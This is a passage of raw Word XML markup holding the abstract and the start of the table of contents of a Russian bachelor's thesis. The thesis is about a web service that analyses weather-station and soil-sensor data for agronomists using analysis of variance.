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5C6C39" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00892905">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc136258103"/>
      <w:bookmarkStart w:id="1" w:name="_Toc136258398"/>
      <w:bookmarkStart w:id="2" w:name="_Toc136259020"/>
      <w:r>
        <w:t>РЕФЕРАТ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="10B0AE56" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="004F5453" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F5453">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Тема бакалаврской работы «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Разработка веб-сервиса для обработки данных полевых измерений</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5453">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CD4BC" w14:textId="67093485" w:rsidR="0093378B" w:rsidRPr="004F5453" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Бакалаврская работа содержит </w:t>
      </w:r>
      <w:r w:rsidR="00BF681E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> страниц, </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> рисунк</w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблицы, </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> источник.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A12AE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F5453">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевые слова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">дисперсионный анализ, статистика, анализ данных, веб-технологии, модель-представление-контроллер, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5453">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B63A4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00464AEF" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r w:rsidRPr="00464AEF">
        <w:t>Объектом исследования явля</w:t>
      </w:r>
      <w:r>
        <w:t>ются</w:t>
      </w:r>
      <w:r w:rsidRPr="00464AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>данные автоматической цифровой метеостанции и почвенных датчиков-влагомеров, требующие анализа и визуализации</w:t>
      </w:r>
      <w:r w:rsidRPr="00464AEF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B81800A" w14:textId="77777777" w:rsidR="00AA0AC4" w:rsidRPr="00BD5112" w:rsidRDefault="00AA0AC4" w:rsidP="00AA0AC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464AEF">
        <w:t>Предметом исследования явля</w:t>
      </w:r>
      <w:r>
        <w:t>ются</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>методы обработки данных для проведения анализа, в частности, алгоритм однофакторного дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F7D66" w14:textId="63B6817E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Целью выпускной квалификационной работы является </w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">создание </w:t>
      </w:r>
      <w:r w:rsidR="004177C2">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>интернет-портала как инструмента</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>обработки и визуализации данных, полученных с автоматической цифровой метеостанции</w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и почвенных датчиков-влагомеров</w:t>
      </w:r>
      <w:r w:rsidR="004177C2">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для агрономов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A9257" w14:textId="4E1BB44C" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r>
        <w:t>Были и</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46F4B">
        <w:t xml:space="preserve">зучены методы </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">дисперсионного анализа, </w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1">
        <w:t>ранжирования</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> данных для обработки ненормально распределённых данных, непараметрические методы, изучены существующие конкурентные решения, реализованы алгоритмы проведения многофакторного дисперсионного анализа, р</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46F4B">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">зработана программа отображения результатов </w:t>
      </w:r>
      <w:r w:rsidR="00B10A09">
        <w:t>однофакторного</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дисперсионного анализа. </w:t>
      </w:r>
      <w:r w:rsidR="00B10A09">
        <w:t>П</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">роизведено тестирование программы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3CD6BD" w14:textId="6B0C7435" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r>
        <w:t xml:space="preserve">В результате </w:t>
      </w:r>
      <w:r w:rsidR="004177C2">
        <w:t>работы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разработана</w:t>
      </w:r>
      <w:r w:rsidR="004177C2">
        <w:t xml:space="preserve"> и внедрена</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> система </w:t>
      </w:r>
      <w:r w:rsidR="00B10A09">
        <w:t xml:space="preserve">мониторинга и анализа состояния агроэкосистемы на опытном полигоне в посёлке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B10A09">
        <w:t>Меньково</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B10A09">
        <w:t xml:space="preserve"> Ленинградской области</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C070746" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AED082" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="001C0E55">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00892905">
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>СОДЕРЖАНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25263B2F" w14:textId="6AB725E9" w:rsidR="00CC2EBA" w:rsidRDefault="00EB2F89">
      <w:pPr>
        <w:pStyle w:val="14"/>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162709227" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ВВЕДЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709227 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46B9453A" w14:textId="66AECDF6" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709228" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Цель работы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709228 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CA1A307" w14:textId="424A0E28" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709229" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Задачи</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709229 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FF81F07" w14:textId="4AB03C54" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709230" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1 Использование информационных технологий и математических моделей для решения задач в сфере сельского хозяйства</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709230 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CCB476E" w14:textId="0211E07C" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709231" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.1</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:lang w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Необходимость разработки программы для проведения исследований данных</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709231 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D80126A" w14:textId="16D2DFE7" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709232" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.2</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:lang w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Необходимость использования дисперсионного анализа</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709232 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="754F42F9" w14:textId="204297A7" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709233" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.3</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:lang w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Математическая модель дисперсионного анализа и непараметрические методы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709233 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CC93BD2" w14:textId="25E0B081" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709234" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2 Обзор существующих решений</w:t>
        </w:r>
